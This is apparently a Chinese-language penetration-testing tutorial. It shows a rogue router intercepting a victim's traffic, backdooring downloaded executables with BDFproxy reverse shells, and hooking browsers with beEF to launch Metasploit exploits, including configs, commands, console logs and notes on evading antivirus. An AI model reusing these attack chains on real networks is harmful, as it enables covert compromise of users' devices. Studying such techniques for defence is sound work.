十步之外,可取汝SHELL
本文介紹了使用WooyunWifi+BDFproxy+Metasploit的GETSHELL工具組合,并介紹了BDF的原理,并簡要介紹了WooyunWifi+beEF+Metasploit的GETSHELL組合及其原理
本文使用的工具及縮寫一覽:
Backdoor Factory(后門工廠),縮寫:bdf
Backdoor Factory Proxy(后門工廠代理器),縮寫:bdfproxy
The Browser Exploitation Framework(瀏覽器漏洞利用框架),縮寫:beEF
WooyunWifi路由器是一款用于無線網絡安全測試&學習的智能路由器
在本文中,分別使用了WooyunWifi的流量轉發功能、JS注入功能
流量轉發功能可以讓目標設備的流量轉發至進行實際執行安全測試工具的設備上,即提供了免配置的中間人網絡介入。中間人攻擊的傳統手法有ARP欺騙、DNS欺騙等,均需要其他安全工具配合,難度較大且物理條件要求苛刻(需要額外的設備接入同一網段,并且要關閉可能的Lan隔離及ARP防火墻)。因此,WooyunWifi提供的一鍵流量轉發功能可以使您跳過網絡層手工配置,直接使用任意設備對目標設備進行應用層的安全測試
JS注入功能可以提供簡單的腳本注入,可以用來做啟動更大腳本HOOK平臺的跳板,舉例說本文中介紹的beEF平臺就是由JS注入功能初始化,然后直接HOOK住目標瀏覽器進行安全測試的。JS注入攻擊的傳統手法非常復雜,首先需要依賴于上文所說的網絡層攻擊,之后還要配合應用層的JS注入工具,最后才能開始使用beEF平臺,由于前幾步驟的難度極高,因此傳統上相對更加簡單的JS注入反而變得難以實施。因此,WooyunWifi自身集成的安全工具已經實現了JS注入功能,您可以簡單地通過WEB界面進行JS注入,簡單直接地對目標瀏覽器進行安全測試。
WooyunWifi的WEB配置:
在WooyunWifi的WEB界面中點擊Settings(高級設置)按鈕,在Traffic Redirect選項中填寫流量轉發的目標設備IP以及用于安全測試設備的IP,例:
192.168.1.134 是目標設備的IP,該IP的流量將被轉發至Proxy IP
192.168.1.163 是安全測試設備的IP,該IP將接收到來自192.168.1.134的流量
bdfproxy配置:
如果您使用的是Kali Nethunter手機,您已經安裝好bdfproxy了。如果您使用的是Kali Linux的老版本(我不確定新版本是否將包含bdfproxy),您可以使用
apt-get install bdfproxy
安裝bdfproxy以及相關的依賴軟件包
默認情況下,您極有可能安裝bdfproxy至
/usr/share/bdfproxy
如果您是直接從git上獲得并編譯的源代碼,請自己尋找您的bdfproxy配置文件的路徑
默認的配置文件可能在/etc/bdfproxy下
修改其中的部分內容如下:
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
bdf以及bdfproxy的作者為Joshua Pitts,聯系方式如上,He is awesome!!!
[Overall]
transparentProxy = transparent # Modes: None, socks5, transparent, reverse, upstream
我們使用的是透明代理模式,默認的是常規代理模式,區別是常規代理模式通過瀏覽器設置代理然后通過代理協議傳輸數據(格式和普通HTTP請求不一樣),而透明代理則完全是流量轉發格式不變,因此我們在這里使用透明代理
MaxSizeFileRequested = 100000000 # will send a 502 request of large content to the client (server error)
最大文件大小,過大的話會返回502頁面,建議使用小文件測試
certLocation = ~/.mitmproxy/mitmproxy-ca.pem
這是mitm的依賴庫需要的證書,如果您遇到的報錯和這個有關,先手動運行一下mitmf
proxyPort = 8080
sslports = 443, 8443
loglevel = INFO
logname = proxy.log
resourceScript = bdfproxy_msf_resource.rc
這個是和Metasploit結合的resource文件,之后的命令部分和這個文件名有關
[targets]
//掛馬的目標
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[ALL]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[LinuxIntelx86]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
默認用的是BDF的reverse_shell_tcp,其他選項看BDF文檔
HOST = 192.168.1.163 # The C2
這是PAYLOAD中的LHOST,就是開著Metasploit等著SHELL反彈的設備IP
PORT = 8888
端口不要和PROXY的重復了
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
這個是Metasploit的PAYLOAD名稱,相當于SET PAYLOAD命令
配置完畢之后,把Metasploit的服務打開,我們接下來要開啟工具了:
iptables -A PREROUTING -t nat -i eth0 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 8080
以上是第一步:將HTTP/HTTPS流量轉發至bdfproxy
[email protected]:~# bdfproxy
[!] Writing resource script.
[!] Resource writen to bdfproxy_msf_resource.rc
[!] Starting BDFProxy
[!] Author: @midnite_runr | the[.]midnite).(runr<at>gmail|.|com
********** REQUEST **********
[*] HOST: 203.208.48.142
[*] PATH: /__utm.gif?utmwv=5.6.5&utms=22&utmn=842124717&utmhn=www.slideshare.net&utmt=event&utme=5(Newsfeed*Featured_time_on_page*440)8(member_type)9(FREE)11(1)&utmcs=UTF-8&utmsr=1920x1080&utmvp=1903x971&utmsc=24-bit&utmul=zh-cn&utmje=1&utmfl=18.0%20r0&utmdt=lxj616%E2%80%99s%20Newsfeed&utmhid=1466934019&utmr=http%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Freadtemplate%3Ft%3Dsafety%26check%3Dfalse%26gourl%3Dhttp%253A%252F%252Fwww.slideshare.net%252Fconfirm%252FODEwNDQ5Njg7MDA2Zjg0OWMzNjZiZmRmYTc0YWIwYzQyNzcyZGIzMjhjZTA2YmI5MA%253D%253D%253Futm_source%253Dconfirmemail%2526utm_medium%253Dssemail%2526utm_campaign%253Dconfirm_email%26subtemplate%3Dgray%26evil%3D0&utmp=%2Flxj616%2Fnewsfeed%3Fredirect%3D1&utmht=1439103172080&utmac=UA-2330466-1&utmni=1&utmcc=__utma%3D186399478.1272612003.1439088302.1439089490.1439090092.3%3B%2B__utmz%3D186399478.1439089490.2.2.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B&utmjid=&utmu=6RCAACAAAAAAAAAAAAAAAAAE~
********** END REQUEST **********
以上是第二步:開啟bdfproxy,如果您配置正確,在目標設備訪問網頁時可以看到bdfproxy中截獲的REQUEST如上所示
********** REQUEST **********
[*] HOST: 221.204.160.47
[*] PATH: /sw-search-sp/soft/78/15699/putty_V0.63.0.0.43510830.exe
********** END REQUEST **********
========== RESPONSE ==========
[*] HOST: 221.204.160.47
[*] PATH: /sw-search-sp/soft/78/15699/putty_V0.63.0.0.43510830.exe
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 638
[*] All caves lengths: (638,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 638
[*] Available caves:
1. Section Name: None; Section Begin: None End: None; Cave begin: 0x294 End: 0xffc; Cave Size: 3432
2. Section Name: .rdata; Section Begin: 0x57000 End: 0x73000; Cave begin: 0x7262c End: 0x73000; Cave Size: 2516
3. Section Name: None; Section Begin: None End: None; Cave begin: 0x743d0 End: 0x7500a; Cave Size: 3130
**************************************************
[!] Enter your selection: 2
[!] Using selection: 2
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
[*] Patching complete, forwarding to user.
========== END RESPONSE ==========
在目標設備通過HTTP下載文件時,您將在bdfproxy中看到攔截下的請求,提示您選擇注入的CAVE,這里上面我選擇了2,輸入2然后回車,目標設備這時成功下載到putty.exe,看上去毫無異樣。
以上截圖出自WooyunWifi 2.0的視頻,目前版本已經到達3.0,除了功能增強也有一個全新界面了
先不解釋發生了什么,我們先來啟動Metasploit:
[email protected]:/usr/share/bdfproxy# msfconsole -r ./bdfproxy_msf_resource.rc
請注意,這里的bdfproxy_msf_resource.rc正是我們上文中設置文件的名稱,可能位于/usr/share/bdfproxy下面,如果您自己編譯的bdfproxy,那您需要自己找這文件放哪里了
[*] Started reverse handler on 192.168.1.163:5555
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (770048 bytes) to 192.168.1.134
[*] Meterpreter session 1 opened (192.168.1.163:8443 -> 192.168.1.134:57625) at 2015-08-09 14:58:22 +0800
可以看到啟動時開啟了一堆handler等待bdfproxy使用,當目標設備運行putty.exe時,顯示Meterpreter session 1 opened,這時已經獲取到了目標設備的SHELL
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 FullMatelErLuLu\OrgeDaLuLu @ FULLMATELERLULU 192.168.1.163:8443 -> 192.168.1.134:57625 (192.168.1.134)
具體拿到SHELL之后怎么用,請參閱Metasploit的文檔,這里就不細說了
首先,我們來看看我們大概做了一件什么事情:
目標設備->WooyunWifi路由器->安全測試設備(Kali+bdfproxy)->網站
那么發生了什么事情呢?
目標設備請求putty.exe->WooyunWifi路由器轉發->安全測試設備(bdfproxy)攔截到請求->bdfproxy根據配置請求BDF掛后門->BDF請求Metasploit生成后門SHELLCODE->把SHELLCODE填進CAVE中(一會兒解釋)->響應發回目標設備->目標設備下載完無異常于是執行->執行SHELLCODE->反彈SHELL給Metasploit
大家最關心的肯定是BDF掛后門時的CAVE是什么意思,下面以Joshua Pitts(BDF作者,He is awesome!!!)的PPT來翻譯講解BDF的原理,給出PPT原地址,翻譯時格式有改動內容有刪改:
http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
Metasploit掛后門的方式:
msfvenom –p windows/shell_reverse_tcp –x psexec.exe … 這是覆蓋掉原來程序入口點的方式
msfvenom –p windows/shell_reverse_tcp –x psexec.exe –k … 這是分配并創建一個新的線程然后跳轉回原始程序入口點的方式(Keep 保留方式)
覆蓋掉程序入口點之前:
覆蓋掉程序入口點之后:
覆蓋程序入口點方式的好處和弊端:
好處:攻擊者可以拿到SHELL
好處:EXE文件大小沒有改變
壞處:程序無法繼續執行(崩掉了)
創建新線程但是保留程序入口點方法:
可以明顯地看到新增了一個RWE的code section
創建新線程但是保留程序入口點方法的好處和弊端:
好處:拿到SHELL并且程序可以繼續執行
壞處:容易被殺毒軟件偵測到
壞處:文件大小增加了
CTP方式掛后門:
添加一個新的code section,這和保留程序入口點的msfvenom Keep方式相似,然后使用存在的code Caves來加解密新加的code section中的SHELLCODE(我們嘗試過xor加密,但是已經對殺毒軟件沒啥用了)
譯者注:上圖與keep方式比較相似,先跳到新加的code section然后跳回原來的程序入口點
那么,什么是Code Caves 呢?
Code Cave 是指在一個二進制文件中存在的一個全都是空字節(x00)的區域
編者注:如上圖一堆x00的區域,就是一個Code Cave
Code Cave的產生與編譯器有關:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
int array[600] = {0};
int main(int argc, char **argv)
{
printf("hello world");
return 0;
}
不同編譯器下在section中大于200字節的Code Caves個數:
Cl.exe : 7
G++: 4
Mingw32-c++: 3
Lcc-win32: 0
BDF工作原理:
識別PE/COFF頭格式
識別是否支持該二進制文件格式(win32/64 intel)
定位適用于指定SHELLCODE的Code Caves
試著掛后門并且讓程序跳回原來狀態繼續執行
把入口點用JMP指到第一個選擇的Code Cave或者添加的code section來掛到每個用戶選擇的Code Cave中
使用自定的SHELLCODE:
提醒一點,最好使用ExitFunction=Thread不然就會殺掉父進程,這樣BDF就沒用了
最后,對比一下文中所述的三種掛后門方式:
MSFVENOM –k –t exe
MSFVENOM –t exe
BDF Cave jumping
然后對比一下32位掛后門和64位掛后門的效果:
因此,BDF在自動化掛后門流程的同時,也實現了CTP方式掛后門的功能,這也就是之前手動選擇Code Cave的原因,根據測試結果看來,Cave跳轉方式過殺軟的效果最好,而64位后門比32位后門的隱蔽性更高
WooyunWifi的WEB配置:
在WooyunWifi的WEB界面中點擊Settings(高級設置)按鈕,在jsInject選項中填寫要注入的JS語句,例:
document.write("<script language='javascript' src='http://192.168.1.163:3000/hook.js'></script>");
我們注入的是JS語句,請不要混淆“JS語句”、“HTML標簽”和“JS文件”的區別,在beEF中會自動生成hook.js并提示其URL地址,我們要想讓beEF成功hook到目標瀏覽器,就要在目標瀏覽器上對應頁面執行hook.js,因此我們使用JS語法document.write寫入一個html標簽,然后由標簽來在當前頁面加載hook.js(js執行的頁面對beEF有重大影響,建議以這種方式在當前頁面進行hook,您也可以嘗試其他方式)
請先啟動beef,Kali linux默認情況下集成了beEF,可以通過beef-xss命令啟動,或者在快捷啟動欄里也可以找到啟動器
hook成功后,將在beef“Hooked Browsers”里面彈出上線的瀏覽器,在這里可以看到詳細的瀏覽器信息
如圖,目標瀏覽器為IE 9,并且支持Flash,使用老版本IE還開著Flash這基本上就是隨意拿SHELL的了
上www.exploit-db.com找一個最新的exploit,比如hacking team的flash漏洞,放在msf的modules文件夾下,然后按照exploit代碼mkdir并且touch一個可讀寫的swf文件(具體路徑可以先運行報錯一遍看看在哪)
但是,我是一個口是心非的人,因為我在hacking team事件當天就升級了Flash,降級基本上不可能,而且老版本如果一旦更新就是最新版,實在不想浪費時間去配置個Flash 18.0.0.194特定的版本
讓我來用一個比較冷門的exploit演示Metasploit和beEF的組合用法:
msf exploit(ms14_012_textrange) > use exploit/windows/browser/ie_unsafe_scripting
msf exploit(ie_unsafe_scripting) > info
Name: Microsoft Internet Explorer Unsafe Scripting Misconfiguration
Module: exploit/windows/browser/ie_unsafe_scripting
Platform: Windows
…………
msf exploit(ie_unsafe_scripting) > set SRVHOST 192.168.1.163
SRVHOST => 192.168.1.163
msf exploit(ie_unsafe_scripting) > set payload windows/messagebox
payload => windows/messagebox
msf exploit(ie_unsafe_scripting) > show options
Module options (exploit/windows/browser/ie_unsafe_scripting):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.163 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false noNegotiate SSL for incoming connections
SSLCert noPath to a custom SSL certificate (default is randomly generated)
TECHNIQUE VBS yes Delivery technique (VBS Exe Drop or PSH CMD) (accepted: VBS, Powershell)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/messagebox):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
ICON NOyes Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION
TEXT Hello, from MSF! yes Messagebox Text (max 255 chars)
TITLE MessageBoxyes Messagebox Title (max 255 chars)
Exploit target:
Id Name
-- ----
0 Windows x86/x64
msf exploit(ie_unsafe_scripting) > set URIPATH /a
URIPATH => /a
msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.
msf exploit(ie_unsafe_scripting) >
[*] Using URL: http://192.168.1.163:8080/a
[*] Server started.
[*] 192.168.1.134ie_unsafe_scripting - Request received for /a
[*] 192.168.1.134ie_unsafe_scripting - Sending exploit html/javascript
[*] 192.168.1.134ie_unsafe_scripting - Request received for /a
msf exploit(ie_unsafe_scripting) > set TECHNIQUE Powershell
TECHNIQUE => Powershell
msf exploit(ie_unsafe_scripting) > rerun
[*] Stopping existing job...
[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.
msf exploit(ie_unsafe_scripting) > [*] Using URL: http://192.168.1.163:8080/a
[*] Server started.
[*] 192.168.1.134ie_unsafe_scripting - Request received for /a
[*] 192.168.1.134ie_unsafe_scripting - Sending exploit html/javascript
[*] 192.168.1.134ie_unsafe_scripting - Request received for /a
[*] 192.168.1.134ie_unsafe_scripting - Sending exploit html/javascript
[*] Sending stage (972288 bytes) to 192.168.1.134
[*] Meterpreter session 1 opened (192.168.1.163:4446 -> 192.168.1.134:63098) at 2015-08-09 19:49:09 +0800
[*] 192.168.1.134ie_unsafe_scripting - Request received for /a
[*] 192.168.1.134ie_unsafe_scripting - Sending exploit html/javascript
[*] Sending stage (972288 bytes) to 192.168.1.134
[*] 192.168.1.134ie_unsafe_scripting - Request received for /a
[*] 192.168.1.134ie_unsafe_scripting - Sending exploit html/javascript
[*] Meterpreter session 2 opened (192.168.1.163:4446 -> 192.168.1.134:63099) at 2015-08-09 19:49:37 +0800
Interrupt: use the 'exit' command to quit
msf exploit(ie_unsafe_scripting) > set payload windows/messagebox
payload => windows/messagebox
msf exploit(ie_unsafe_scripting) > rerun
[*] Stopping existing job...
[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.
msf exploit(ie_unsafe_scripting) >
[*] Using URL: http://192.168.1.163:8080/a
[*] Server started.
[*] 192.168.1.134ie_unsafe_scripting - Request received for /a
[*] 192.168.1.134ie_unsafe_scripting - Sending exploit html/javascript
[*] 192.168.1.134ie_unsafe_scripting - Request received for /a
[*] 192.168.1.134ie_unsafe_scripting - Sending exploit html/javascript
為了節省空間,上面演示的命令中我把我敲錯的命令都自己刪掉了 :)
首先你在Metasploit里面要開啟一個Browser Exploit的module,可能為了方便你喜歡手動設置uri為/a,payload可以是reverse shell,這里為了演示用的是MessageBox彈窗
然后在beEF里面讓目標瀏覽器跳轉至你的Browser Exploit的uri中,如圖:
之后目標瀏覽器就會訪問我們設置好的Metasploit Browser Exploit頁面,觸發漏洞:
首先,看看我們做了一件什么事情:
目標設備發出瀏覽網頁請求->WooyunWifi路由器不作改動->網站服務器->網站響應發回WooyunWifi路由器->WooyunWifi路由器在JS文件中插入寫標簽代碼->WooyunWifi將修改后的響應發回目標設備->目標設備執行寫標簽代碼->目標設備通過html標簽加載并執行了安全測試設備上的hook.js代碼->hook.js代碼與安全測試設備上的beEF進行交互式的操作->beEF準備指令hook.js跳轉至安全測試設備上的Metasploit Browser Exploit uri->目標設備當前頁面受hook.js控制跳轉至安全測試設備上的Metasploit Browser Exploit uri->Metasploit準備并發送瀏覽器攻擊代碼->目標設備瀏覽器被攻擊后執行后門代碼->目標設備后門代碼與安全測試設備上的Metasploit進行交互->GETSHELL成功
那么,什么是Browser Exploit呢?Browser Exploit就是利用瀏覽器的漏洞來滲透目標設備的方法,常見的比如ie的漏洞都可能導致目標設備在訪問惡意頁面后直接被GETSHELL,另外其他的比如Flash漏洞也都是可以通過瀏覽器來觸發的,因此也可納于Browser Exploit范疇
Metasploit的瀏覽器攻擊方式為建立一個uri以供目標設備訪問,之后對特定的uri執行特定的漏洞利用模塊
而beEF可以收集瀏覽器的信息,比如版本、插件、安全設置等等,可以根據beEF的信息選擇Metasploit所要選擇的漏洞利用模塊
WooyunWifi可以使目標設備的瀏覽器毫無痕跡地執行hook.js,這樣可以與beEF進行交互,再由beEF指令目標設備跳轉至Metasploit uri
WooyunWifi不是一個黑客路由器,它只是一個用來研究、學習、交流的集成測試平臺,請自覺遵守相關法律法規。該路由器僅在烏云集市中以平臺積分形式贊助給在烏云平臺上做過卓越貢獻的白帽子,我們認為這些白帽子具備合格的安全知識能力及職業道德素質,兌換該路由器即保證僅用于學習研究用途。
那么,目標設備是怎么連上WooyunWifi的呢?破解WPA/WPA2握手包 + 5種方式秒殺無客戶端連接嗅探不到包的WEP + 半握手包破解 + WPS在線暴力/pixie dust離線破解WPS-PIN + de-authentication掉線攻擊 + KARMA混雜響應劫持手機掃描 + 利用大數據制作更好的弱密碼字典,欲知后事如何 且聽下回分解~